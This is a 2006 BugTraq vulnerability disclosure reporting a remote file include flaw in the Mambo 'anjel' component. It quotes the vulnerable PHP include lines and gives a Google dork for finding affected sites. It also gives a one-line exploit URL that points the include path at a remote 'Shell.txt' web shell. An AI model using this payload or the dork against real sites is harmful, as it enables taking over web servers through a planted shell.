BugTraq
anjel Mambo Component Remote File Include Aug 17 2006 09:09PM
crackers_child sibersavascilar com (1 replies)
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : anjel Mambo Component Remote File Include Vulnerabilities

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]

------------------------------------------------------------------------
--------

Google Dorks : inurl:"/com_anjel/"

------------------------- -------------------------------------------------------

Application : anjel Component of Mambo

------------------------------------------------------------------------
--------

Bug İn anjel.index.php

include_once( '../../globals.php' );

require_once( '../../configuration.php' );

require_once( $mosConfig_absolute_path . '/includes/joomla.php' );

------------------------------------------------------------------------
--------

Exploit:

http://[target]/[mambo_path]/components/com_anjel/anjel.index.php?mosCon
fig_absolute_path=Shell.txt?

------------------------------------------------------------------------
--------

greets:

All My Friends And SiberSavascilar.Com Members !

------------------------------------------------------------------------
--------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

[ reply ]
Re: anjel Mambo Component Remote File Include Aug 18 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus